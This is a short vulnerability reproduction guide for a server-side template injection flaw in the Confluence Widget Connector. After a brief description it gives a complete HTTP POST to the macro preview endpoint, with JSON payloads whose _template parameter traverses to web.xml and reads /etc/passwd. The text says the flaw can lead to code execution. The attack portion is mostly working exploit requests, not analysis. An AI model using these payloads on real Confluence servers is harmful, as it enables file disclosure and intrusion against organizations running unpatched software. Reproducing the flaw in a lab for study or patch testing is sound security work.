Confluence
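Atlassian Confluence (Confluence for short) is a professional wiki (a multi-user collaborative writing system). It is a knowledge-management tool that lets team members collaborate and share knowledge.
Approach
The Widget Connector in Confluence Server and Confluence Data Center has a server-side template injection vulnerability. By crafting a specific request, an attacker can remotely traverse arbitrary files on the server and can then include a malicious file to execute code.
Vulnerability reproduction
Click Get an evaluation license and verify your email address
Copy the key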
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{
"contentId":"786458","macro":{
"name":"widget","body":"","params":{
"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
After that request is sent successfully, try modifying _template to read an arbitrary file
{
"contentId":"786458","macro":{
"name":"widget","body":"","params":{
"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}